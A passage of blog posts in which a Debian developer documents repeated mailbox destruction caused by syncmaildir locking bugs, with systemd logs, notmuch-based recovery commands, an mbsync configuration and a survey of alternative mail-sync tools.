 +Host imap.anarc.at
 +User register
 +PassCmd "pass imap.anarc.at-register"
 +SSLType IMAPS
 +CertificateFile /etc/ssl/certs/ca-certificates.crt
 +
 +IMAPStore anarcat-register-remote
 +Account anarcat-register
 +
 +MaildirStore anarcat-register-local
 +SubFolders Maildir++
 +Inbox ~/Maildir-mbsync/.register/
 +
 +Channel anarcat-register
 +Master :anarcat-register-remote:
 +Slave :anarcat-register-local:
 +Create slave

"tmp" folders and empty messages After syncing the "register" messages, I end up with the measly little 160 emails out of sync:
anarcat@angela:~(main)$ find Maildir-mbsync/  -type f -a \! -name '.*' | wc -l
384900
anarcat@angela:~(main)$ find Maildir/  -type f -a \! -name '.*' | wc -l
385059
Argh. After more digging, I have found 131 mails in the tmp/ directories of the client's mail spool. Mysterious! On the server side, it's even more files, and not the same ones. Possibly those were mails that were left there during a failed delivery of some sort, during a power failure or some sort of crash? Who knows. It could be another race condition in SMD if it runs while mail is being delivered in tmp/... The first thing to do with those is to clean up a bunch of empty files (21 on angela):
find .[^.]*/tmp -type f -empty -delete
As it turns out, they are all duplicates, in the sense that notmuch can easily find a copy of files with the same message ID in its database. In other words, this hairy command returns nothing:
find .[^.]*/tmp -type f | while read path; do
  msgid=$(grep -m 1 -i ^message-id "$path" | sed 's/Message-ID: //i;s/[<>]//g');
  if notmuch count --exclude=false "id:$msgid" | grep -q 0; then
    echo "$path <$msgid> not in notmuch" ;
  fi;
done
... which is good. Or, to put it another way, this is safe:
find .[^.]*/tmp -type f -delete
Poof! 314 mails cleaned on the server side. Interestingly, SMD doesn't pick up on those changes at all and still sees files in tmp/ directories on the client side, so we need to operate the same twisted logic there.

notmuch to the rescue again After cleaning that on the client, we get:
anarcat@angela:~(main)$ find Maildir/  -type f -a \! -name '.*' | wc -l
384928
anarcat@angela:~(main)$ find Maildir-mbsync/  -type f -a \! -name '.*' | wc -l
384901
Ha! A difference of 27 mails. Those are the really sticky, unclear ones. I was hoping a full sync might clear that up, but after deleting the entire directory and starting from scratch, I end up with:
anarcat@angela:~(main)$ find Maildir -type f -a \! -name '.*' | wc -l 
385034
anarcat@angela:~(main)$ find Maildir-mbsync -type f -a \! -name '.*' | wc -l 
384993
That is: even more messages missing (now 41). Sigh. Thankfully, this is something notmuch can help with: it can index all files by Message-ID (which I learned is case-insensitive, yay) and tell us which messages don't make it through. Considering the corruption I found in the mail spool, I wouldn't be the least bit surprised if those messages were simply skipped by the IMAP server. Unfortunately, there's nothing in the Dovecot server logs that would explain the discrepancy. Here again, notmuch comes to the rescue. We can list all message IDs to figure out that discrepancy:
notmuch search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-msgids
notmuch --config=.notmuch-config-mbsync search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-mbsync-msgids
And then we can see how many messages notmuch thinks are missing:
$ wc -l *msgids
372723 Maildir-mbsync-msgids
372752 Maildir-msgids
That's 29 messages. Oddly, it doesn't exactly match the find output:
anarcat@angela:~(main)$ find Maildir-mbsync -type f -a \! -name '.*' | wc -l 
385204
anarcat@angela:~(main)$ find Maildir -type f -a \! -name '.*' | wc -l 
385241
That is 10 more messages. Ugh. But actually, I know what those are: more misfiled messages (in a .folder/draft/ directory, bizarrely), so the totals actually match. In the notmuch output, there's a lot of stuff like this:
id:notmuch-sha1-fb880d673e24f5dae71b6b4d825d4a0d5d01cde4
Those are messages without a valid Message-ID. Notmuch (presumably) constructs one based on the file's checksum. Because the files differ between the IMAP server and the local mail spool (which is unfortunate, but possibly inevitable), those do not match. There are exactly as many of those on both sides, so I'll go ahead and assume they are all accounted for. What remains is:
anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\-[^-]' | grep -v sha1 | wc -l 
2
anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\+[^+]' | grep -v sha1 | wc -l 
21
anarcat@angela:~(main)$ 
i.e. 21 missing from mbsync and, surprisingly, 2 missing from the original mail spool. Further inspection showed they were all messages with some sort of "corruption": no body, only headers. I am not sure that is even a legal email format in the first place. Since they were mostly spam or administrative emails ("You have been unsubscribed from mailing list..."), it seems fairly harmless to ignore them.

Conclusion As we'll see in the next article, SMD has stellar performance. But that comes at a huge cost: it accesses the mail storage directly. This can create, and has created, significant problems on the mail server. It's unclear exactly why those things happen, but Dovecot expects a particular format for its mail storage, and it seems unwise to bypass it. In the future, I'll try to remember to avoid that, especially since mechanisms like SMD require special server access (SSH) which, in the long term, I am not sure I want to maintain or even expect. In other words, just talking with an IMAP server opens up a lot more hosting possibilities than setting up a custom synchronisation protocol over SSH. It's also safer and more reliable, as we have seen. Thankfully, I've been able to recover from all the errors I could find, but it could have gone differently, and SMD could have permanently corrupted a significant part of my mail archives. In the end, however, the last straw was just another weird bug which, ironically, SMD mysteriously recovered from on its own while I was writing this documentation and migrating away from it. In any case, I recommend SMD users start looking for alternatives. The project has been archived upstream, and the Debian package has been orphaned. I have seen significant mailbox corruption, including entire mail spool destruction, mostly due to incorrect locking code. I have filed a release-critical bug in Debian to make sure it doesn't ship with Debian bookworm. Alternatives like mbsync provide fast and reliable transport, including over SSH. See the next article for further discussion of the alternatives.

29 June 2021

Antoine Beaupré: Another syncmaildir crash

So I had another major email crash with my syncmaildir setup. This time I was at least able to confirm the issue, and I still haven't lost mail thanks to backups and sheer luck (again).

The crash It is not really worth going over the crash in detail; it's fairly similar to the last one: something bad happened and smd started destroying everything. The hint is that it takes a long time to do what usually takes seconds. It helps that I now have a second monitor showing logs. I still lost much more mail than the last time. I used to have "301 723 messages", according to notmuch. But then when I ran smd-pull by hand, it was telling me:
95K emails scanned
Oops. You can see notmuch happily noticing the destroyed files on the server:
jun 28 16:33:40 marcos notmuch[28532]: No new mail. Removed 65498 messages. Detected 1699 file renames.
jun 28 16:36:05 marcos notmuch[29746]: No new mail. Removed 68883 messages. Detected 2488 file renames.
jun 28 16:41:40 marcos notmuch[31972]: No new mail. Removed 118295 messages. Detected 3657 file renames.
The final count ended up being 81 042 messages, according to notmuch. A whopping 220 000 mails deleted. The interesting bit, this time around, is that I caught smd in the act of running two processes in parallel:
jun 28 16:30:09 curie systemd[2845]: Finished pull emails with syncmaildir. 
jun 28 16:30:09 curie systemd[2845]: Starting push emails with syncmaildir... 
jun 28 16:30:09 curie systemd[2845]: Starting pull emails with syncmaildir... 
So clearly that is the source of the bug.
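One way to guard against that kind of overlap would be to serialize the two units behind a single lock. Here is a sketch of such a wrapper; this is not something smd or systemd provides out of the box, and the lock path and wrapper idea are mine:
#!/usr/bin/python3
"""Run an smd command under an exclusive lock so pull and push never overlap.

Usage: smd-serialize COMMAND [ARGS...]  (hypothetical wrapper, sketch only)
"""
import fcntl
import subprocess
import sys

LOCKFILE = "/run/user/1000/smd.lock"   # hypothetical path

with open(LOCKFILE, "w") as lock:
    fcntl.flock(lock, fcntl.LOCK_EX)   # blocks until the other instance is done
    sys.exit(subprocess.run(sys.argv[1:]).returncode)
Pointing both the smd-pull.service and smd-push.service ExecStart= lines at such a wrapper would make the 16:30:09 overlap above impossible.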

Recovery Emergency stop on curie:
notmuch dump > notmuch.dump
systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
On marcos (the server), I guessed the number of messages delivered since the last backup to be 71, just by looking at timestamps in the mail log. I made a list:
grep postfix/local /var/log/mail.log | tail -71 > lost-mail
Found postfix queue IDs:
sed 's/.*\]://;s/:.*//' lost-mail > qids
Turn those into message IDs, then find those that are missing from the disk (I had previously run notmuch new just to be sure it was up to date):
while read qid ; do 
    grep "$qid: message-id" /var/log/mail.log
done < qids | sed 's/.*message-id=<//;s/>//' | while read msgid; do
    sudo -u anarcat notmuch count --exclude=false id:$msgid | grep -q 0 && echo $msgid
done
Copy this back on curie as missing-msgids and:
$ wc -l missing-msgids 
48 missing-msgids
$ while read msgid ; do notmuch count --exclude=false id:$msgid | grep -q 0 && echo $msgid ; done < missing-msgids
mailman.189.1624881611.23397.nodes-reseaulibre.ca@reseaulibre.ca
AnwMy7rdSpK-N-vt4AiOag@ismtpd0148p1mdw1.sendgrid.net
only two mails missing! whoohoo! Copy those back onto marcos as really-missing-msgids, and look at the full mail logs to see what they are:
~anarcat/src/koumbit-scripts/mail/postfix-trace --from-file really-missing-msgids2
I actually remembered deleting those, so no mail lost! Rebuild the list of msgids that were lost, on marcos:
while read qid ; do grep "$qid: message-id" /var/log/mail.log; done < qids | sed 's/.*message-id=<//;s/>//'
Copy that on curie as lost-mail-msgids, then copy the files over in a test dir:
while read msgid ; do
    notmuch search --output=files --exclude=false "id:$msgid"
done < lost-mail-msgids | sed 's#/home/anarcat/Maildir/##' | rsync -v --files-from=- /home/anarcat/Maildir/ shell.anarc.at:restore/Maildir-angela/
If that looks about right, on marcos:
find restore/Maildir-angela/ -type f | wc -l
... should match the number of missing mails, roughly. Copy it into the real spool:
while read msgid ; do
    notmuch search --output=files --exclude=false "id:$msgid"
done < lost-mail-msgids | sed 's#/home/anarcat/Maildir/##' | rsync -v --files-from=- /home/anarcat/Maildir/ shell.anarc.at:Maildir/
Then on the server, notmuch new should find the new emails, and we shouldn't have any lost mail anymore:
while read qid ; do grep "$qid: message-id" /var/log/mail.log; done < qids | sed 's/.*message-id=<//;s/>//' | while read msgid; do sudo -u anarcat notmuch count --exclude=false id:$msgid | grep -q 0 && echo $msgid ; done
Then, crucial moment, try to pull the new mails from the backups on curie:
anarcat@curie:~(main)$ smd-pull  -n  --show-tags -v
Found lockfile of a dead instance. Ignored.
Phase 0: handshake
Phase 1: changes detection
    5K emails scanned
   10K emails scanned
   15K emails scanned
   20K emails scanned
   25K emails scanned
   30K emails scanned
   35K emails scanned
   40K emails scanned
   45K emails scanned
   50K emails scanned
Phase 2: synchronization
Phase 3: agreement
default: smd-client@localhost: TAGS: stats::new-mails(49687), del-mails(0), bytes-received(215752279), xdelta-received(3703852)
"smd-pull  -n  --show-tags -v" took 3 mins 39 secs
This brought me back to the state after the backup plus the mails delivered during the day, which means I had to catch up with all the mail I had already read over the holidays (1440 mails!), but thankfully I had made a dump of the notmuch database on curie at the start of the procedure, so this actually restored a sane state:
pv notmuch.dump | notmuch restore
Phew!

Workaround I have filed this as a bug in upstream issue 18. Considering I filed 11 issues and only 3 of those were closed, I'm not holding my breath. I nevertheless filed PR 19 in the hope that this will fix my particular issue, but I'm not even sure this is the right fix...

Fix At this point, I'm really ready to give up on SMD. It's really, really nice to be able to sync mail over SSH because I don't need to store my IMAP password on disk. But surely there are more reliable syncing mechanisms. I do not remember ever losing that much mail before. At worst, offlineimap would duplicate emails like mad, but never destroy my entire mail spool that way. As mentioned before, there are other programs that sync mail. I'm looking at:
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, see comment below
  • isync/mbsync: might be faster, I remember having trouble switching from offlineimap to this, has support for TLS client certs, running over SSH, and generally has good words from multiple Debian and notmuch people
  • getmail: just downloads email, might not be enough
  • nncp: treat the local spool as another mail server, might not be compatible with my "multiple clients" setup
  • doveadm-sync: requires dovecot on both ends, but supports using SSH to sync, will try this next, may have performance problems, see comment below
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, seems awfully complicated to setup, mentions rsmtp which is a nice name for rsendmail

23 March 2021

Antoine Beaupré: Major email crash with syncmaildir

TL;DR: I lost half my mail (150,000 messages, ~6GB) last night. The cause is uncertain, but possibly a combination of a dead CMOS battery, systemd OnCalendar=daily, a (locking?) bug in syncmaildir, and, generally, a system too exotic and complicated.

The crash So I somehow lost half my mail:
anarcat@angela:~(main)$ du -sh Maildir/
7,9G    Maildir/
anarcat@curie:~(main)$ du -sh Maildir
14G     Maildir
anarcat@marcos:~$ du -sh Maildir
8,0G    Maildir
Those are three different machines:
  • angela: my laptop, not always on
  • curie: my workstation, mostly always on
  • marcos: my mail server, always on
Those mails are synchronized using a rather exotic system based on SSH, syncmaildir and rsendmail. The anomaly started on curie:
-- Reboot --
mar 22 16:13:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:13:00 curie smd-pull[4801]: rm: impossible de supprimer '/home/anarcat/.smd/workarea/Maildir': Le dossier n'est pas vide
mar 22 16:13:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:13:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:13:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:14:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:14:00 curie smd-pull[7025]:  4091 ?        00:00:00 smd-push
mar 22 16:14:00 curie smd-pull[7025]: Already running.
mar 22 16:14:00 curie smd-pull[7025]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:14:00 curie smd-pull[7025]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 4091) run(rm /home/anarcat/.smd/lock))
mar 22 16:14:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:14:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:14:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
Then it seems like smd-push (from curie) started destroying the universe for some reason:
mar 22 16:20:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:20:00 curie smd-pull[9319]:  4091 ?        00:00:00 smd-push
mar 22 16:20:00 curie smd-pull[9319]: Already running.
mar 22 16:20:00 curie smd-pull[9319]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:20:00 curie smd-pull[9319]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(ru
mar 22 16:20:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:20:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:20:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:21:34 curie smd-push[4091]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:21:35 curie smd-push[9374]: register: smd-client@smd-server-register: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:21:35 curie systemd[3199]: smd-push.service: Succeeded.
Notice the del-mails(293920) there: it is actively trying to destroy basically every email in my mail spool. Then somehow push and pull started both at once:
mar 22 16:21:35 curie systemd[3199]: Started push emails with syncmaildir.
mar 22 16:21:35 curie systemd[3199]: Starting push emails with syncmaildir...
mar 22 16:22:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:22:00 curie smd-pull[10333]:  9455 ?        00:00:00 smd-push
mar 22 16:22:00 curie smd-pull[10333]: Already running.
mar 22 16:22:00 curie smd-pull[10333]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:22:00 curie smd-pull[10333]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(r
mar 22 16:22:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:22:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:22:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: Data transmission failed.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: Unable to open Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: Maildir/.kobo/cur/1498563708.M122624P22121.marco
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: Unable to open requested file.
mar 22 16:22:00 curie smd-push[9455]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:22:00 curie smd-push[9455]: default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:22:00 curie smd-push[9455]: default: smd-server@localhost: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested-actions(r
mar 22 16:22:00 curie systemd[3199]: smd-push.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:22:00 curie systemd[3199]: smd-push.service: Failed with result 'exit-code'.
mar 22 16:22:00 curie systemd[3199]: Failed to start push emails with syncmaildir.
There it seems push tried to destroy the universe again: del-mails(293920). Interestingly, the push started again in parallel with the pull, right that minute:
mar 22 16:22:00 curie systemd[3199]: Starting push emails with syncmaildir...
... but didn't complete for a while, here's pull trying to start again:
mar 22 16:24:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:24:00 curie smd-pull[12051]: 10466 ?        00:00:00 smd-push
mar 22 16:24:00 curie smd-pull[12051]: Already running.
mar 22 16:24:00 curie smd-pull[12051]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:24:00 curie smd-pull[12051]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 10466) run(rm /home/anarcat/.smd/lock))
mar 22 16:24:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:24:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:24:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
... and the long push finally resolving:
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: Data transmission failed.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: Data transmission failed.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: Unable to open Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: No such file or directory
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: Unable to open requested file.
mar 22 16:24:00 curie smd-push[10466]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:24:00 curie smd-push[10466]: default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:24:00 curie smd-push[10466]: default: smd-server@localhost: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:24:00 curie systemd[3199]: smd-push.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:24:00 curie systemd[3199]: smd-push.service: Failed with result 'exit-code'.
mar 22 16:24:00 curie systemd[3199]: Failed to start push emails with syncmaildir.
mar 22 16:24:00 curie systemd[3199]: Starting push emails with syncmaildir...
This pattern repeats until 16:35, when that locking issue silently recovered somehow:
mar 22 16:35:03 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:35:41 curie smd-pull[20788]: default: smd-client@localhost: TAGS: stats::new-mails(5), del-mails(1), bytes-received(21885), xdelta-received(6863398)
mar 22 16:35:42 curie smd-pull[21373]: register: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:35:42 curie systemd[3199]: smd-pull.service: Succeeded.
mar 22 16:35:42 curie systemd[3199]: Started pull emails with syncmaildir.
mar 22 16:36:35 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:36:36 curie smd-pull[21738]: default: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(214)
mar 22 16:36:37 curie smd-pull[21816]: register: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:36:37 curie systemd[3199]: smd-pull.service: Succeeded.
mar 22 16:36:37 curie systemd[3199]: Started pull emails with syncmaildir.
... notice that huge xdelta-received there, that's 7GB right there. Mysteriously, the curie mail spool survived this, possibly because smd-pull started failing again:
mar 22 16:38:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:38:00 curie smd-pull[23556]: 21887 ?        00:00:00 smd-push
mar 22 16:38:00 curie smd-pull[23556]: Already running.
mar 22 16:38:00 curie smd-pull[23556]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:38:00 curie smd-pull[23556]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 21887) run(rm /home/anarcat/.smd/lock))
mar 22 16:38:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:38:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:38:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
That could have been when I got on angela to check my mail, and it was busy doing the nasty removal stuff... although the times don't match. Here is when angela came back online:
anarcat@angela:~(main)$ last
anarcat  :0           :0               Mon Mar 22 19:57   still logged in
reboot   system boot  5.10.0-0.bpo.3-a Mon Mar 22 19:57   still running
anarcat  :0           :0               Mon Mar 22 17:43 - 18:47  (01:03)
reboot   system boot  5.10.0-0.bpo.3-a Mon Mar 22 17:39   still running
Then finally the sync on curie started failing with:
mar 22 16:46:35 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:46:42 curie smd-pull[27455]: smd-server: ERROR: Client aborted, removing /home/anarcat/.smd/curie-anarcat__Maildir.db.txt.new and /home/anarcat/.smd/curie-anarcat__Maildir.db.txt.mtime.new
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: Failed to copy Maildir/.debian/cur/1613401668.M901837P27073.marcos,S=3740,W=3815:2,S to Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: The destination already exists but its content differs.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: To fix this problem you have two options:
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: - rename Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S by hand so that Maildir/.debian/cur/1613401668.M901837P27073.marcos,S=3740,W=3815:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   can be copied without replacing it.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   Executing  cd; mv -n "Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S" "Maildir/.koumbit/cur/1616446002.1.localhost"  should work.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: - run smd-push so that your changes to Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   are propagated to the other mailbox
mar 22 16:46:42 curie smd-pull[27455]: default: smd-client@localhost: TAGS: error::context(copy-message) probable-cause(concurrent-mailbox-edit) human-intervention(necessary) suggested-actions(run(mv -n "/home/anarcat/.smd/workarea/Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S" "/home/anarcat/.smd/workarea/Maildir/.koumbit/tmp/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S") run(smd-push default))
mar 22 16:46:42 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:46:42 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:46:42 curie systemd[3199]: Failed to start pull emails with syncmaildir.
It went on like this until I found the problem. This is, presumably, a good thing because those emails were not being destroyed. On angela, things looked like this:
-- Reboot --
mar 22 17:39:29 angela systemd[1677]: Started run notmuch new at least once a day.
mar 22 17:39:29 angela systemd[1677]: Started run smd-pull regularly.
mar 22 17:40:46 angela systemd[1677]: Starting pull emails with syncmaildir...
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: Unable to open Maildir/.tor/new/1616446842.M285912P26118.marcos,S=8860,W=8996: Maildir/.tor/new/1616446842.M285912P26118.marcos,S=886
0,W=8996: No such file or directory
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: Unable to open requested file.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: Data transmission failed.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: This problem is transient, please retry.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: server sent ABORT or connection died
mar 22 17:43:18 angela smd-pull[3916]: default: smd-server@smd-server-anarcat: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested
-actions(retry)
mar 22 17:43:18 angela smd-pull[3916]: default: smd-client@localhost: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 17:43:18 angela systemd[1677]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 17:43:18 angela systemd[1677]: smd-pull.service: Failed with result 'exit-code'.
mar 22 17:43:18 angela systemd[1677]: Failed to start pull emails with syncmaildir.
mar 22 17:43:18 angela systemd[1677]: Starting pull emails with syncmaildir...
mar 22 17:43:29 angela smd-pull[4847]: default: smd-client@localhost: TAGS: stats::new-mails(29), del-mails(0), bytes-received(401519), xdelta-received(38914)
mar 22 17:43:29 angela smd-pull[5600]: register: smd-client@localhost: TAGS: stats::new-mails(2), del-mails(0), bytes-received(92150), xdelta-received(471)
mar 22 17:43:29 angela systemd[1677]: smd-pull.service: Succeeded.
mar 22 17:43:29 angela systemd[1677]: Started pull emails with syncmaildir.
mar 22 17:43:29 angela systemd[1677]: Starting push emails with syncmaildir...
mar 22 17:43:32 angela smd-push[5693]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(217)
mar 22 17:43:33 angela smd-push[6575]: register: smd-client@smd-server-register: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(219)
mar 22 17:43:33 angela systemd[1677]: smd-push.service: Succeeded.
mar 22 17:43:33 angela systemd[1677]: Started push emails with syncmaildir.
Notice how long it took to get the first error, in that first failure: it failed after 3 minutes! Presumably that's when it started deleting all that mail. And this is during pull, not push, so the error didn't come from angela.

Affected data It seems 2GB of mail from my main INBOX was destroyed. Another 2.4GB of spam (kept for training purposes) was also destroyed, along with 700MB of Sent mail. The rest is hard to figure out, because the folders are actually still there, just smaller. So I relied on ncdu to figure out the size changes. (Note that I don't really archive (or delete much of) my mail since I use notmuch, which is why the INBOX is so large...) Concretely, according to the notmuch-new.service which still runs periodically on marcos, here are the changes that happened on the server:
mar 22 16:17:12 marcos notmuch[10729]: Added 7 new messages to the database. Removed 57985 messages. Detected 1372 file renames.
mar 22 16:22:43 marcos notmuch[12826]: No new mail. Removed 143842 messages. Detected 6072 file renames.
mar 22 16:27:02 marcos notmuch[13969]: No new mail. Removed 82071 messages. Detected 1783 file renames.
mar 22 16:29:45 marcos notmuch[15079]: Added 22743 new messages to the database. Detected 1 file rename.
mar 22 16:31:48 marcos notmuch[16196]: Added 22779 new messages to the database. Removed 5 messages.
mar 22 16:33:11 marcos notmuch[17192]: Added 3711 new messages to the database.
mar 22 16:40:41 marcos notmuch[19122]: Added 74558 new messages to the database. Detected 1 file rename.
mar 22 16:43:21 marcos notmuch[20325]: Added 9061 new messages to the database. Detected 4 file renames.
mar 22 17:43:08 marcos notmuch[7420]: Added 1793 new messages to the database. Detected 6 file renames.
That is basically the entire mail spool destroyed at first (283 898 messages), and then bits and pieces of it progressively re-added (134 645 messages), somehow, so 149 253 mails were lost, presumably.
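Those totals can be double-checked by tallying the journal lines above; a quick throwaway sketch (paste the full set of log lines into the string):
import re

log = """
mar 22 16:17:12 marcos notmuch[10729]: Added 7 new messages to the database. Removed 57985 messages. Detected 1372 file renames.
mar 22 16:22:43 marcos notmuch[12826]: No new mail. Removed 143842 messages. Detected 6072 file renames.
"""  # ... and so on for the remaining journal lines

added = sum(int(n) for n in re.findall(r"Added (\d+) new message", log))
removed = sum(int(n) for n in re.findall(r"Removed (\d+) message", log))
print(f"added {added}, removed {removed}, net loss {removed - added}")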

Recovery I disabled the services all over the place:
systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
(Well, technically, I did that only on angela, as I thought the problem was there. Luckily, curie kept going but it seems like it was harmless.) I made a backup of the mail spool on curie:
tar cf - Maildir/ | pv -s 14G | gzip -c > Maildir.tgz
